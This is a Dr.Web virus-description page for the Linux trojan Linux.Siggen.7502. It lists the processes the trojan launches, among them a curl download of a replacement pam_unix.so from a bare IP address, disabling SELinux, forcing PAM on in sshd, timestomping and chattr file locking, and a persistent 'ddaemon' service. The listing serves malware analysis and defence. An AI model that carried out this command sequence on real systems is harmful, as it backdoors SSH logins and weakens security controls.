Linux.Siggen.7502
Added to the Dr.Web virus database:
2024-05-21
Virus description added:
2024-05-21
Technical Information
Malicious functions:
Removes the following system files:
Manages services:
- ['systemctl', 'restart', 'sshd']
- ['systemctl', 'daemon-reload']
- ['systemctl', 'enable', 'ddaemon']
- ['systemctl', 'start', 'ddaemon']
Launches processes:
- sh /usr/bin/jc_new.sh
- tr -d .
- mv /lib/x86_64-linux-gnu/security/pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chattr +ia /etc/selinux/config
- cut -c1-3
- chattr +ia /lib/x86_64-linux-gnu/security/pam_unix.so
- sed -i s/^UsePAM no/UsePAM yes/ /etc/ssh/sshd_config
- head -1
- grep -oP pam-\x5cK[\x5cd\x5c.]+
- sed -i s/SELINUX=enforcing/SELINUX=disabled/ /etc/selinux/config
- touch /lib/x86_64-linux-gnu/security/pam_unix.so -r /lib/x86_64-linux-gnu/security/pam_unix.so.bak
- chmod 644 /lib/x86_64-linux-gnu/security/pam_unix.so
- curl -o /lib/x86_64-linux-gnu/security/pam_unix.so http://103.101.205.192:90/jc/pam_unix.so_v
- /bin/sh /usr/bin/which curl
- rm -- /usr/bin/jc_new.sh
- chattr -ia /lib/x86_64-linux-gnu/security/pam_unix.so
Performs operations with the file system:
Modifies file access rights:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
Modifies file owner:
Creates or modifies files:
- /run/ddaemon.pid
- /usr/bin/jc_new.sh
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
- /etc/ssh/sed087j9z
- /etc/systemd/system/ddaemon.service
Locks files:
Changes time of creation/access/modification of files:
- /usr/lib/x86_64-linux-gnu/security/pam_unix.so
Network activity:
Establishes connection:
Sends data to the following servers:
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細